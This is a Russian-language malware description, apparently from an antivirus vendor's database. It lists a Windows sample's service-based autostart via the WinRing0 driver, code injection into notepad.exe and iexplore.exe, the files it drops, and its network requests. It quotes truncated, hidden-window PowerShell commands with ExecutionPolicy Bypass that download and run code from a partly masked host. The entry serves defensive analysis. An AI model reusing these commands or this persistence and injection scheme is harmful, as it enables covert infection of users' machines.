Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%WINDIR%\WinRing0x64.sys'
Создает следующие сервисы
- 'WinRing0_1_2_0' %WINDIR%\WinRing0x64.sys
Вредоносные функции
Загружает файлы и запускает на исполнение.
Внедряет код в
следующие системные процессы:
- %WINDIR%\notepad.exe
следующие пользовательские процессы:
- iexplore.exe
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\zckikinbzt\083626eddd_3.1.0
- %ALLUSERSPROFILE%\zckikinbzt\cfgi
- %ALLUSERSPROFILE%\zckikinbzt\cfg
Сетевая активность
TCP
Запросы HTTP GET
- http://13#.#81.34.1/min3/loader23435345465446.jpg
UDP
- DNS ASK pa###bin.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "<PATH_SAMPLE>.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$...
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\notepad.exe' -c "%ALLUSERSPROFILE%\zCKIkINbzT\cfg"
